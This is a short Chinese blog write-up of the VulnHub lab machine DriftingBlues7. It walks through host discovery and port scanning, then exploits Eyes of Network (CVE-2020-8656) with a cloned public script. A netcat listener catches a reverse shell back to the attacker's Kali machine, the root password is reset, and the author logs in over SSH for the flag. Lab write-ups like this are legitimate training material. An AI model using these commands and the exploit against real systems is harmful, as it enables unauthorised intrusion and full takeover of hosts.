vulnhub靶机:driftingblues7

一:信息收集

1:主机发现

arp-scan -I eth0 10.9.23.0/24

kali的ip:10.9.23.112

靶机ip:10.9.23.93

2:端口扫描

nmap -A -p- -T4 10.9.23.93

开放了22,66,80,443,3306端口

3:端口探测

访问66端口,因为是上面运行了SimpleHttpServer

访问80端口,发现一个登录界面,来百度搜索Eyes of network发现可以利用的exp

漏洞编号

CVE-2020-8656

找到一个可以利用的漏洞克隆到kali

https://github.com/h4knet/eonrce

git clone https://github.com/h4knet/eonrce.git

二:渗透测试

赋予执行权限

chmod +x eonrce.py

在Kali 开启监听

nc -lvvp 6666

运行脚本:

./eonrce.py https://10.9.23.93 -ip 10.9.23.112 -port 6666

修改root的密码passwd root

由之前扫描发现开了ssh服务,我们用 ssh 连接靶机

ssh 10.9.23.93

发现最后flag

posted @ 2024-03-05 11:54  woaishuaidan  阅读(25)  评论(0)    收藏  举报